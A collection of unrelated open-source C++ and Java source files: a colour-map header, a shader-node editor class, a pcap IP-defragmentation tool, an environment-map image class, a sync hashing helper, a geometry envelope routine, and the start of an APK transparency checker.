case Family::BuPu: os << "BuPu"; break;
case Family::Dark2: os << "Dark2"; break;
case Family::GnBu: os << "GnBu"; break;
case Family::Greens: os << "Greens"; break;
case Family::Greys: os << "Greys"; break;
case Family::OrRd: os << "OrRd"; break;
case Family::Oranges: os << "Oranges"; break;
case Family::PRGn: os << "PRGn"; break;
case Family::Paired: os << "Paired"; break;
case Family::Pastel1: os << "Pastel1"; break;
case Family::Pastel2: os << "Pastel2"; break;
case Family::PiYG: os << "PiYG"; break;
case Family::PuBu: os << "PuBu"; break;
case Family::PuBuGn: os << "PuBuGn"; break;
case Family::PuOr: os << "PuOr"; break;
case Family::PuRd: os << "PuRd"; break;
case Family::Purples: os << "Purples"; break;
case Family::RdBu: os << "RdBu"; break;
case Family::RdGy: os << "RdGy"; break;
case Family::RdPu: os << "RdPu"; break;
case Family::RdYlBu: os << "RdYlBu"; break;
case Family::RdYlGn: os << "RdYlGn"; break;
case Family::Reds: os << "Reds"; break;
case Family::Set1: os << "Set1"; break;
case Family::Set2: os << "Set2"; break;
case Family::Set3: os << "Set3"; break;
case Family::Spectral: os << "Spectral"; break;
case Family::YlGn: os << "YlGn"; break;
case Family::YlGnBu: os << "YlGnBu"; break;
case Family::YlOrBr: os << "YlOrBr"; break;
case Family::YlOrRd: os << "YlOrRd"; break;
case Family::NumberOfColormapFamilies: os << "NumberOfColormapFamilies"; break;
case Family::Undefined: os << "Undefined"; break;
// clang-format on
}
return os;
}
/**
* Returns the specified colormap. For reference see http://colorbrewer2.org/
**/
IVW_CORE_API const std::vector<dvec4>& getColormap(Colormap colormap);
/**
* Returns the minimum number of colors for which the requested family is available.
**/
IVW_CORE_API glm::uint8 getMinNumberOfColorsForFamily(const Family& family);
/**
* Returns the maximum number of colors for which the requested family is available.
**/
IVW_CORE_API glm::uint8 getMaxNumberOfColorsForFamily(const Family& family);
/**
* Returns all families contained in the specified category.
**/
IVW_CORE_API std::vector<Family> getFamiliesForCategory(const Category& category);
} // namespace colorbrewer
} // namespace inviwo
| 12,270 |
#include "shader_node.h"
#ifdef ECHO_EDITOR_MODE
#include <nodeeditor/Connection>
namespace Echo
{
ShaderNode::ShaderNode()
: Object()
{
}
ShaderNode::~ShaderNode()
{
EditorApi.showObjectProperty(nullptr);
}
void ShaderNode::bindMethods()
{
CLASS_BIND_METHOD(ShaderNode, getVariableName);
CLASS_BIND_METHOD(ShaderNode, setVariableName);
CLASS_REGISTER_PROPERTY(ShaderNode, "Variable", Variant::Type::String, getVariableName, setVariableName);
}
unsigned int ShaderNode::nPorts(QtNodes::PortType portType) const
{
switch (portType)
{
case QtNodes::PortType::In: return m_inputs.size();
case QtNodes::PortType::Out:return m_outputs.size();
default: return 0;
}
}
NodeDataType ShaderNode::dataType(QtNodes::PortType portType, QtNodes::PortIndex portIndex) const
{
if (portType == QtNodes::PortType::In)
{
return m_inputDataTypes[portIndex];
}
else if (portType == QtNodes::PortType::Out)
{
return m_outputs[portIndex]->type();
}
return NodeDataType{ "invalid", "invalid" };
}
std::shared_ptr<NodeData> ShaderNode::outData(QtNodes::PortIndex portIndex)
{
if(m_outputs.size()>portIndex)
return m_outputs[portIndex];
else
return std::make_shared<DataInvalid>(this);
}
void ShaderNode::setInData(std::shared_ptr<NodeData> nodeData, int portIndex)
{
m_inputs[portIndex] = std::dynamic_pointer_cast<ShaderData>(nodeData);
}
bool ShaderNode::checkValidation()
{
m_modelValidationState = QtNodes::NodeValidationState::Valid;
m_modelValidationError = QStringLiteral("");
// check
if (m_inputDataTypes.size() != m_inputs.size())
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = QStringLiteral("Inputs count error");
return false;
}
// input type check
for (size_t i = 0; i < m_inputDataTypes.size(); i++)
{
if (m_inputs[i] && m_inputs[i]->type().id != m_inputDataTypes[i].id)
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] type error", i).c_str();
return false;
}
}
// check invalid input
for (size_t i = 0; i < m_inputs.size(); i++)
{
if (m_inputs[i] && m_inputs[i]->type().id == "invalid")
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] is invalid", i).c_str();
return false;
}
}
// check invalid output
for (size_t i = 0; i < m_inputs.size(); i++)
{
if (m_inputs[i] && m_inputs[i]->type().id == "invalid")
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] is invalid", i).c_str();
return false;
}
else if (m_inputs[i] && m_inputs[i]->type().id == "any")
{
std::shared_ptr<ShaderData> internalData = DataAny::getInternalData(m_inputs[i]);
if (internalData && internalData->type().id == "invalid")
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] is invalid", i).c_str();
return false;
}
}
}
return true;
}
QJsonObject ShaderNode::save() const
{
QJsonObject nodeJson = NodeDataModel::save();
saveShaderNode(nodeJson);
return nodeJson;
}
void ShaderNode::restore(QJsonObject const& p)
{
restoreShaderNode(p);
}
void ShaderNode::saveShaderNode(QJsonObject& p) const
{
const Object* obj = this;
Echo::PropertyInfos properties;
Echo::Class::getPropertys(getClassName(), (Object*)obj, properties, PropertyInfo::Static | PropertyInfo::Dynamic, true);
for (Echo::PropertyInfo* prop : properties)
{
Echo::Variant variant;
Echo::Class::getPropertyValue((Object*)obj, prop->m_name, variant);
p[prop->m_name.c_str()] = variant.toString().c_str();
}
}
void ShaderNode::restoreShaderNode(QJsonObject const& p)
{
Echo::Object* obj = this;
Echo::PropertyInfos properties;
Echo::Class::getPropertys(getClassName(), obj, properties, 3, true);
for (Echo::PropertyInfo* prop : properties)
{
QJsonValue v = p[prop->m_name.c_str()];
if (!v.isUndefined())
{
Echo::String value = v.toString().toStdString().c_str();
Echo::Variant variant;
variant.fromString(prop->m_type, value);
Echo::Class::setPropertyValue(obj, prop->m_name, variant);
}
}
}
bool ShaderNode::onNodePressed()
{
EditorApi.showObjectProperty(this);
return true;
}
String ShaderNode::getVariableName() const
{
if (m_variableName.empty())
{
Echo::String variableName = name().toStdString().c_str() + Echo::StringUtil::Format("_%d", m_id);
variableName = Echo::StringUtil::Replace(variableName, " ", "");
return variableName;
}
return m_variableName;
}
void ShaderNode::setVariableName(const String& variableName)
{
m_variableName = variableName;
Q_EMIT captionUpdated();
}
i32 ShaderNode::getOutputConnectionCount(QtNodes::PortIndex index)
{
i32 count = 0;
for (const QtNodes::Connection* conn : m_outputConnections)
{
if (conn && conn->getPortIndex(QtNodes::PortType::Out) == index)
count++;
}
return count;
}
void ShaderNode::outputConnectionCreated(QtNodes::Connection const& conn)
{
m_outputConnections.push_back(&conn);
}
void ShaderNode::outputConnectionDeleted(QtNodes::Connection const& conn)
{
m_outputConnections.erase(std::remove(m_outputConnections.begin(), m_outputConnections.end(), &conn), m_outputConnections.end());
}
}
#endif
| 2,225 |
#include <iostream>
#include <map>
#include <sstream>
#include <stdlib.h>
#include <string.h>
#include "PcapPlusPlusVersion.h"
#include "IPv4Layer.h"
#include "IPv6Layer.h"
#include "IPReassembly.h"
#include "PcapFileDevice.h"
#include "SystemUtils.h"
#include "getopt.h"
#define EXIT_WITH_ERROR(reason) do { \
printUsage(); \
std::cout << std::endl << "ERROR: " << reason << std::endl << std::endl; \
exit(1); \
} while(0)
static struct option DefragUtilOptions[] =
{
{"output-file", required_argument, 0, 'o'},
{"filter-by-ipid", required_argument, 0, 'd'},
{"bpf-filter", required_argument, 0, 'f'},
{"copy-all-packets", no_argument, 0, 'a'},
{"help", no_argument, 0, 'h'},
{"version", no_argument, 0, 'v'},
{0, 0, 0, 0}
};
/**
* A struct for collecting stats during the de-fragmentation process
*/
struct DefragStats
{
int totalPacketsRead;
int ipv4Packets;
int ipv6Packets;
int ipv4PacketsMatchIpIDs;
int ipv6PacketsMatchFragIDs;
int ipPacketsMatchBpfFilter;
int ipv4FragmentsMatched;
int ipv6FragmentsMatched;
int ipv4PacketsDefragmented;
int ipv6PacketsDefragmented;
int totalPacketsWritten;
void clear() { memset(this, 0, sizeof(DefragStats)); }
DefragStats() { clear(); }
};
/**
* Print application usage
*/
void printUsage()
{
std::cout << std::endl
<< "Usage:" << std::endl
<< "------" << std::endl
<< pcpp::AppName::get() << " input_file -o output_file [-d frag_ids] [-f bpf_filter] [-a] [-h] [-v]" << std::endl
<< std::endl
<< "Options:" << std::endl
<< std::endl
<< " input_file : Input pcap/pcapng file" << std::endl
<< " -o output_file : Output file. Output file type (pcap/pcapng) will match the input file type" << std::endl
<< " -d frag_ids : De-fragment only fragments that match this comma-separated list of IP IDs (for IPv4) or" << std::endl
<< " fragment IDs (for IPv6) in decimal format" << std::endl
<< " -f bpf_filter : De-fragment only fragments that match bpf_filter. Filter should be provided in Berkeley Packet Filter (BPF)" << std::endl
<< " syntax (http://biot.com/capstats/bpf.html) i.e: 'ip net 1.1.1.1'" << std::endl
<< " -a : Copy all packets (those who were de-fragmented and those who weren't) to output file" << std::endl
<< " -v : Displays the current version and exits" << std::endl
<< " -h : Displays this help message and exits" << std::endl
<< std::endl;
}
/**
* Print application version
*/
void printAppVersion()
{
std::cout
<< pcpp::AppName::get() << " " << pcpp::getPcapPlusPlusVersionFull() << std::endl
<< "Built: " << pcpp::getBuildDateTime() << std::endl
<< "Built from: " << pcpp::getGitInfo() << std::endl;
exit(0);
}
/**
* This method reads packets from the input file, decided which fragments pass the filters set by the user, de-fragment the fragments
* who pass them, and writes the result packets to the output file
*/
void processPackets(pcpp::IFileReaderDevice* reader, pcpp::IFileWriterDevice* writer,
bool filterByBpf, std::string bpfFilter,
bool filterByIpID, std::map<uint32_t, bool> fragIDs,
bool copyAllPacketsToOutputFile,
DefragStats& stats)
{
pcpp::RawPacket rawPacket;
pcpp::BPFStringFilter filter(bpfFilter);
// create an instance of IPReassembly
pcpp::IPReassembly ipReassembly;
pcpp::IPReassembly::ReassemblyStatus status;
// read all packet from input file
while (reader->getNextPacket(rawPacket))
{
bool defragPacket = true;
stats.totalPacketsRead++;
// if user requested to filter by BPF
if (filterByBpf)
{
// check if packet matches the BPF filter supplied by the user
if (pcpp::IPcapDevice::matchPacketWithFilter(filter, &rawPacket))
{
stats.ipPacketsMatchBpfFilter++;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
}
bool isIPv4Packet = false;
bool isIPv6Packet = false;
// check if packet is of type IPv4 or IPv6
pcpp::Packet parsedPacket(&rawPacket);
if (parsedPacket.isPacketOfType(pcpp::IPv4))
{
stats.ipv4Packets++;
isIPv4Packet = true;
}
else if (parsedPacket.isPacketOfType(pcpp::IPv6))
{
stats.ipv6Packets++;
isIPv6Packet = true;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
// if user requested to filter by IP ID
if (filterByIpID)
{
// get the IPv4 layer
pcpp::IPv4Layer* ipv4Layer = parsedPacket.getLayerOfType<pcpp::IPv4Layer>();
if (ipv4Layer != NULL)
{
// check if packet ID matches one of the IP IDs requested by the user
if (fragIDs.find((uint32_t)pcpp::netToHost16(ipv4Layer->getIPv4Header()->ipId)) != fragIDs.end())
{
stats.ipv4PacketsMatchIpIDs++;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
}
// get the IPv6 layer
pcpp::IPv6Layer* ipv6Layer = parsedPacket.getLayerOfType<pcpp::IPv6Layer>();
if (ipv6Layer != NULL && ipv6Layer->isFragment())
{
// if this packet is a fragment, get the fragmentation header
pcpp::IPv6FragmentationHeader* fragHdr = ipv6Layer->getExtensionOfType<pcpp::IPv6FragmentationHeader>();
// check if fragment ID matches one of the fragment IDs requested by the user
if (fragIDs.find(pcpp::netToHost32(fragHdr->getFragHeader()->id)) != fragIDs.end())
{
stats.ipv6PacketsMatchFragIDs++;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
}
}
// if fragment is marked for de-fragmentation
if (defragPacket)
{
// process the packet in the IP reassembly mechanism
pcpp::Packet* result = ipReassembly.processPacket(&parsedPacket, status);
// write fragment/packet to file if:
// - packet is fully reassembled (status of REASSEMBLED)
// - packet isn't a fragment or isn't an IP packet and the user asked to write all packets to output
if (status == pcpp::IPReassembly::REASSEMBLED ||
((status == pcpp::IPReassembly::NON_IP_PACKET || status == pcpp::IPReassembly::NON_FRAGMENT) && copyAllPacketsToOutputFile))
{
writer->writePacket(*result->getRawPacket());
stats.totalPacketsWritten++;
}
// update statistics if packet is fully reassembled (status of REASSEMBLED) and
if (status == pcpp::IPReassembly::REASSEMBLED)
{
if (isIPv4Packet)
stats.ipv4PacketsDefragmented++;
else if (isIPv6Packet)
stats.ipv6PacketsDefragmented++;
// free packet
delete result;
}
// update statistics if packet isn't fully reassembled
if (status == pcpp::IPReassembly::FIRST_FRAGMENT ||
status == pcpp::IPReassembly::FRAGMENT ||
status == pcpp::IPReassembly::OUT_OF_ORDER_FRAGMENT ||
status == pcpp::IPReassembly::MALFORMED_FRAGMENT ||
status == pcpp::IPReassembly::REASSEMBLED)
{
if (isIPv4Packet)
stats.ipv4FragmentsMatched++;
else if (isIPv6Packet)
stats.ipv6FragmentsMatched++;
}
}
// if packet isn't marked for de-fragmentation but the user asked to write all packets to output file
else if (copyAllPacketsToOutputFile)
{
writer->writePacket(rawPacket);
stats.totalPacketsWritten++;
}
}
}
/**
* A method for printing fragmentation process stats
*/
void printStats(const DefragStats& stats, bool filterByIpID, bool filterByBpf)
{
std::ostringstream stream;
stream << "Summary:\n";
stream << "========\n";
stream << "Total packets read: " << stats.totalPacketsRead << std::endl;
stream << "IPv4 packets read: " << stats.ipv4Packets << std::endl;
stream << "IPv6 packets read: " << stats.ipv6Packets << std::endl;
if (filterByIpID)
{
stream << "IPv4 packets match fragment ID list: " << stats.ipv4PacketsMatchIpIDs << std::endl;
stream << "IPv6 packets match fragment ID list: " << stats.ipv6PacketsMatchFragIDs << std::endl;
}
if (filterByBpf)
stream << "IP packets match BPF filter: " << stats.ipPacketsMatchBpfFilter << std::endl;
stream << "Total fragments matched: " << (stats.ipv4FragmentsMatched + stats.ipv6FragmentsMatched) << std::endl;
stream << "IPv4 fragments matched: " << stats.ipv4FragmentsMatched << std::endl;
stream << "IPv6 fragments matched: " << stats.ipv6FragmentsMatched << std::endl;
stream << "Total packets reassembled: " << (stats.ipv4PacketsDefragmented + stats.ipv6PacketsDefragmented) << std::endl;
stream << "IPv4 packets reassembled: " << stats.ipv4PacketsDefragmented << std::endl;
stream << "IPv6 packets reassembled: " << stats.ipv6PacketsDefragmented << std::endl;
stream << "Total packets written to output file: " << stats.totalPacketsWritten << std::endl;
std::cout << stream.str();
}
/**
 * main method of the application
 *
 * Parses command-line options, opens the input capture file and a writer of
 * the matching file type, runs the IP de-fragmentation pass over all packets,
 * and prints summary statistics.
 */
int main(int argc, char* argv[])
{
	pcpp::AppName::init(argc, argv);

	int optionIndex = 0;
	int opt = 0;

	std::string outputFile = "";
	bool filterByBpfFilter = false;
	std::string bpfFilter = "";
	bool filterByFragID = false;
	// Fragment-ID allow list; the map is used as a set, the bool values are unused
	std::map<uint32_t, bool> fragIDMap;
	bool copyAllPacketsToOutputFile = false;

	while((opt = getopt_long(argc, argv, "o:d:f:ahv", DefragUtilOptions, &optionIndex)) != -1)
	{
		switch (opt)
		{
			case 0:
			{
				break;
			}
			case 'o': // output file path
			{
				outputFile = optarg;
				break;
			}
			case 'd': // comma-separated list of fragment IDs to process
			{
				filterByFragID = true;
				// read the IP ID / Frag ID list into the map
				fragIDMap.clear();
				std::string ipIDsAsString = std::string(optarg);
				std::stringstream stream(ipIDsAsString);
				std::string ipIDStr;
				// break comma-separated string into string list
				while(std::getline(stream, ipIDStr, ','))
				{
					// convert the IP ID to uint32_t
					// NOTE(review): atoi() silently yields 0 on non-numeric input, so a
					// malformed token becomes fragment ID 0 instead of an error — confirm
					// this is the intended behavior
					uint32_t fragID = (uint32_t)atoi(ipIDStr.c_str());
					// add the frag ID into the map if it doesn't already exist
					if (fragIDMap.find(fragID) == fragIDMap.end())
						fragIDMap[fragID] = true;
				}
				// verify list is not empty
				if (fragIDMap.empty())
				{
					EXIT_WITH_ERROR("Couldn't parse fragment ID list");
				}
				break;
			}
			case 'f': // BPF filter string; validated up front so we fail fast
			{
				filterByBpfFilter = true;
				bpfFilter = optarg;
				pcpp::BPFStringFilter filter(bpfFilter);
				if (!filter.verifyFilter())
					EXIT_WITH_ERROR("Illegal BPF filter");
				break;
			}
			case 'a': // also copy non-fragment packets to the output file
			{
				copyAllPacketsToOutputFile = true;
				break;
			}
			case 'h':
			{
				printUsage();
				exit(0);
			}
			case 'v':
			{
				// NOTE(review): presumably printAppVersion() terminates the process;
				// otherwise execution falls through to normal processing — confirm
				printAppVersion();
				break;
			}
		}
	}

	// Collect positional arguments: exactly one input file is expected
	std::string inputFile = "";

	int expectedParams = 1;
	int paramIndex = -1;

	for (int i = optind; i < argc; i++)
	{
		paramIndex++;
		if (paramIndex > expectedParams)
			EXIT_WITH_ERROR("Unexpected parameter: " << argv[i]);

		switch (paramIndex)
		{
			case 0:
			{
				inputFile = argv[i];
				break;
			}
			default:
				EXIT_WITH_ERROR("Unexpected parameter: " << argv[i]);
		}
	}

	if (inputFile == "")
	{
		EXIT_WITH_ERROR("Input file name was not given");
	}

	if (outputFile == "")
	{
		EXIT_WITH_ERROR("Output file name was not given");
	}

	// create a reader device from input file
	// (getReader() picks the pcap vs. pcap-ng reader based on the file)
	pcpp::IFileReaderDevice* reader = pcpp::IFileReaderDevice::getReader(inputFile);

	if (!reader->open())
	{
		EXIT_WITH_ERROR("Error opening input file");
	}

	// create a writer device for output file in the same file type as input file
	pcpp::IFileWriterDevice* writer = NULL;

	if (dynamic_cast<pcpp::PcapFileReaderDevice*>(reader) != NULL)
	{
		writer = new pcpp::PcapFileWriterDevice(outputFile, ((pcpp::PcapFileReaderDevice*)reader)->getLinkLayerType());
	}
	else if (dynamic_cast<pcpp::PcapNgFileReaderDevice*>(reader) != NULL)
	{
		writer = new pcpp::PcapNgFileWriterDevice(outputFile);
	}
	else
	{
		EXIT_WITH_ERROR("Cannot determine input file type");
	}

	if (!writer->open())
	{
		// NOTE(review): reader/writer are not freed on the error paths; acceptable
		// only because EXIT_WITH_ERROR presumably terminates the process — confirm
		EXIT_WITH_ERROR("Error opening output file");
	}

	// run the de-fragmentation process
	DefragStats stats;
	processPackets(reader, writer, filterByBpfFilter, bpfFilter, filterByFragID, fragIDMap, copyAllPacketsToOutputFile, stats);

	// close files
	reader->close();
	writer->close();

	// print summary stats to console
	printStats(stats, filterByFragID, filterByBpfFilter);

	delete reader;
	delete writer;
}
| 5,024 |
587 | <gh_stars>100-1000
//
// SPDX-License-Identifier: BSD-3-Clause
// Copyright (c) Contributors to the OpenEXR Project.
//
//-----------------------------------------------------------------------------
//
// class EnvmapImage
//
//-----------------------------------------------------------------------------
#include "EnvmapImage.h"
#include <ImathFun.h>
#include "namespaceAlias.h"
using namespace IMF;
using namespace IMATH;
// Default constructor: build a 1x1 latitude-longitude environment map
// whose data window covers the single pixel at (0, 0); the pixel is
// zeroed by clear().
EnvmapImage::EnvmapImage ()
    : _type (ENVMAP_LATLONG)
    , _dataWindow (V2i (0, 0), V2i (0, 0))
    , _pixels (1, 1)
{
    clear ();
}
// Construct an environment map of the given projection type whose pixel
// array covers dataWindow.  The Array2D is sized (height, width) — the y
// extent comes first.  All pixels are zeroed by clear().
EnvmapImage::EnvmapImage (Envmap type, const Box2i& dataWindow)
    : _type (type)
    , _dataWindow (dataWindow)
    , _pixels (
          dataWindow.max.y - dataWindow.min.y + 1,
          dataWindow.max.x - dataWindow.min.x + 1)
{
    clear ();
}
// Re-shape the image for a new projection type and data window.
// resizeEraseUnsafe() discards the previous pixel contents without
// preserving them; all pixels are then zeroed via clear().
void
EnvmapImage::resize (Envmap type, const Box2i& dataWindow)
{
    _pixels.resizeEraseUnsafe (
        dataWindow.max.y - dataWindow.min.y + 1,
        dataWindow.max.x - dataWindow.min.x + 1);
    _type = type;
    _dataWindow = dataWindow;
    clear ();
}
void
EnvmapImage::clear ()
{
int w = _dataWindow.max.x - _dataWindow.min.x + 1;
int h = _dataWindow.max.y - _dataWindow.min.y + 1;
for (int y = 0; y < h; ++y)
{
for (int x = 0; x < w; ++x)
{
Rgba& p = _pixels[y][x];
p.r = 0;
p.g = 0;
p.b = 0;
p.a = 0;
}
}
}
// Return the map's projection type (e.g. latitude-longitude or cube face).
Envmap
EnvmapImage::type () const
{
    return _type;
}

// Return the data window describing the pixel area of the image.
const Box2i&
EnvmapImage::dataWindow () const
{
    return _dataWindow;
}

// Mutable access to the pixel array (indexed [y][x]).
Array2D<Rgba>&
EnvmapImage::pixels ()
{
    return _pixels;
}

// Read-only access to the pixel array (indexed [y][x]).
const Array2D<Rgba>&
EnvmapImage::pixels () const
{
    return _pixels;
}
namespace
{

// Convert a 3D direction to a 2D pixel position in a
// latitude-longitude environment map.
V2f
dirToPosLatLong (const Box2i& dataWindow, const V3f& dir)
{
    return LatLongMap::pixelPosition (dataWindow, dir);
}

// Convert a 3D direction to a 2D pixel position in a cube-face
// environment map: first determine which face the direction hits and
// the position within that face, then map that pair to overall pixel
// coordinates.
V2f
dirToPosCube (const Box2i& dataWindow, const V3f& dir)
{
    CubeMapFace face;
    V2f posInFace;
    CubeMap::faceAndPixelPosition (dir, dataWindow, face, posInFace);
    return CubeMap::pixelPosition (face, dataWindow, posInFace);
}

} // namespace
Rgba
EnvmapImage::filteredLookup (V3f d, float r, int n) const
{
    //
    // Filtered environment map lookup: Take n by n point samples
    // from the environment map, clustered around direction d, and
    // combine the samples with a tent filter.
    //

    //
    // Depending on the type of map, pick an appropriate function
    // to convert 3D directions to 2D pixel positions.
    //

    V2f (*dirToPos) (const Box2i&, const V3f&);

    if (_type == ENVMAP_LATLONG)
        dirToPos = dirToPosLatLong;
    else
        dirToPos = dirToPosCube;

    //
    // Pick two vectors, dx and dy, of length r, that are orthogonal
    // to the lookup direction, d, and to each other.
    //

    d.normalize ();

    V3f dx, dy;

    // Cross with whichever unit axis is less parallel to d, so the
    // cross product cannot degenerate to a near-zero vector.
    if (abs (d.x) > 0.707f)
        dx = (d % V3f (0, 1, 0)).normalized () * r;
    else
        dx = (d % V3f (1, 0, 0)).normalized () * r;

    dy = (d % dx).normalized () * r;

    //
    // Take n by n point samples from the map, and add them up.
    // The directions for the point samples are all within the pyramid
    // defined by the vectors d-dy-dx, d-dy+dx, d+dy-dx, d+dy+dx.
    //

    float wt = 0; // running sum of tent-filter weights

    // Weighted accumulators for each channel
    float cr = 0;
    float cg = 0;
    float cb = 0;
    float ca = 0;

    for (int y = 0; y < n; ++y)
    {
        // ry sweeps the open interval (-1, 1); wy is the 1D tent
        // weight for this row (peaks at the center, 0 at the edges)
        float ry = float (2 * y + 2) / float (n + 1) - 1;
        float wy = 1 - abs (ry);
        V3f ddy (ry * dy);

        for (int x = 0; x < n; ++x)
        {
            float rx = float (2 * x + 2) / float (n + 1) - 1;
            float wx = 1 - abs (rx);
            V3f ddx (rx * dx);
            Rgba s = sample (dirToPos (_dataWindow, d + ddx + ddy));

            // 2D tent weight is the product of the two 1D weights
            float w = wx * wy;

            wt += w;
            cr += s.r * w;
            cg += s.g * w;
            cb += s.b * w;
            ca += s.a * w;
        }
    }

    // Normalize by the total accumulated weight
    wt = 1 / wt;

    Rgba c;
    c.r = cr * wt;
    c.g = cg * wt;
    c.b = cb * wt;
    c.a = ca * wt;

    return c;
}
Rgba
EnvmapImage::sample (const V2f& pos) const
{
    //
    // Point-sample the environment map image at 2D position pos.
    // Interpolate bilinearly between the four nearest pixels.
    //

    // x1/x2 bracket pos.x; sx is the interpolation weight of the x1
    // column (1 when pos.x falls exactly on x1), tx the weight of x2.
    int x1 = IMATH::floor (pos.x);
    int x2 = x1 + 1;

    float sx = x2 - pos.x;
    float tx = 1 - sx;

    // Clamp to the data window (edge pixels repeat outside the window)
    // and shift into zero-based array coordinates.
    x1 = clamp (x1, _dataWindow.min.x, _dataWindow.max.x) - _dataWindow.min.x;
    x2 = clamp (x2, _dataWindow.min.x, _dataWindow.max.x) - _dataWindow.min.x;

    // Same bracketing, weights and clamping for the y direction.
    int y1 = IMATH::floor (pos.y);
    int y2 = y1 + 1;

    float sy = y2 - pos.y;
    float ty = 1 - sy;

    y1 = clamp (y1, _dataWindow.min.y, _dataWindow.max.y) - _dataWindow.min.y;
    y2 = clamp (y2, _dataWindow.min.y, _dataWindow.max.y) - _dataWindow.min.y;

    // Fetch the four neighbors and blend channel by channel.
    Rgba p11 = _pixels[y1][x1];
    Rgba p12 = _pixels[y1][x2];
    Rgba p21 = _pixels[y2][x1];
    Rgba p22 = _pixels[y2][x2];

    Rgba p;
    p.r = (p11.r * sx + p12.r * tx) * sy + (p21.r * sx + p22.r * tx) * ty;
    p.g = (p11.g * sx + p12.g * tx) * sy + (p21.g * sx + p22.g * tx) * ty;
    p.b = (p11.b * sx + p12.b * tx) * sy + (p21.b * sx + p22.b * tx) * ty;
    p.a = (p11.a * sx + p12.a * tx) * sy + (p21.a * sx + p22.a * tx) * ty;

    return p;
}
| 2,521 |
2,151 | <reponame>google-ar/chromium
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "components/sync/base/hash_util.h"
#include "base/base64.h"
#include "base/sha1.h"
#include "components/sync/protocol/sync.pb.h"
namespace syncer {
// Returns a base64-encoded SHA-1 hash that identifies |client_tag| within
// |model_type|'s namespace.
std::string GenerateSyncableHash(ModelType model_type,
                                 const std::string& client_tag) {
  // An EntitySpecifics message with just the default field for |model_type|
  // set serializes with a terminating symbol, which makes it a convenient
  // type-specific delimiter to prepend to the tag.
  sync_pb::EntitySpecifics type_prefix;
  AddDefaultFieldValue(model_type, &type_prefix);

  std::string input;
  type_prefix.AppendToString(&input);
  input.append(client_tag);

  std::string hash;
  base::Base64Encode(base::SHA1HashString(input), &hash);
  return hash;
}
// Computes the syncable hash for a bookmark entity.  The originator cache
// GUID and originator client item ID are concatenated to form the client
// tag passed to GenerateSyncableHash() under the BOOKMARKS model type.
std::string GenerateSyncableBookmarkHash(
    const std::string& originator_cache_guid,
    const std::string& originator_client_item_id) {
  return GenerateSyncableHash(
      BOOKMARKS, originator_cache_guid + originator_client_item_id);
}
} // namespace syncer
| 410 |
326 | // Boost.Geometry
// Copyright (c) 2021, Oracle and/or its affiliates.
// Contributed and/or modified by <NAME>, on behalf of Oracle
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#ifndef BOOST_GEOMETRY_ALGORITHMS_DETAIL_ENVELOPE_GEOMETRY_COLLECTION_HPP
#define BOOST_GEOMETRY_ALGORITHMS_DETAIL_ENVELOPE_GEOMETRY_COLLECTION_HPP
#include <boost/geometry/algorithms/detail/visit.hpp>
#include <boost/geometry/algorithms/dispatch/envelope.hpp>
#include <boost/geometry/algorithms/is_empty.hpp>
#include <boost/geometry/core/tags.hpp>
namespace boost { namespace geometry
{
#ifndef DOXYGEN_NO_DISPATCH
namespace dispatch
{
// Envelope calculation for geometry collections: accumulate the envelope
// of every non-empty element into a strategy-provided multi_state, then
// extract the combined minimum bounding rectangle.
template <typename Collection>
struct envelope<Collection, geometry_collection_tag>
{
    template <typename Geometry, typename Box, typename Strategy>
    static inline void apply(Geometry const& geometry,
                             Box& mbr,
                             Strategy const& strategy)
    {
        // strategy.envelope() is evaluated only at the type level here,
        // to deduce the concrete strategy and its multi_state type.
        using strategy_t = decltype(strategy.envelope(geometry, mbr));
        using state_t = typename strategy_t::template multi_state<Box>;
        state_t state;
        // Visit each element of the collection; returning true from the
        // functor continues the traversal.  Empty elements contribute
        // nothing to the envelope and are skipped.
        detail::visit_breadth_first([&](auto const& g)
        {
            if (! geometry::is_empty(g))
            {
                Box b;
                // Dispatch on the element's own (possibly varied) type
                envelope<util::remove_cref_t<decltype(g)>>::apply(g, b, strategy);
                state.apply(b);
            }
            return true;
        }, geometry);
        state.result(mbr);
    }
};
} // namespace dispatch
#endif // DOXYGEN_NO_DISPATCH
}} // namespace boost::geometry
#endif // BOOST_GEOMETRY_ALGORITHMS_DETAIL_ENVELOPE_GEOMETRY_COLLECTION_HPP
| 761 |
2,594 | /*
* Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License
*/
package com.android.tools.build.bundletool.transparency;
import static com.google.common.collect.ImmutableMap.toImmutableMap;
import static com.google.common.collect.ImmutableSet.toImmutableSet;
import com.android.bundle.CodeTransparencyOuterClass.CodeRelatedFile;
import com.android.bundle.CodeTransparencyOuterClass.CodeTransparency;
import com.android.tools.build.bundletool.model.BundleMetadata;
import com.android.tools.build.bundletool.model.exceptions.InvalidCommandException;
import com.android.tools.build.bundletool.model.utils.ZipUtils;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSet;
import com.google.common.hash.Hashing;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Path;
import java.util.Optional;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
import org.jose4j.jws.JsonWebSignature;
/** Helper class for verifying code transparency for a given set of device-specific APKs. */
public final class ApkTransparencyCheckUtils {

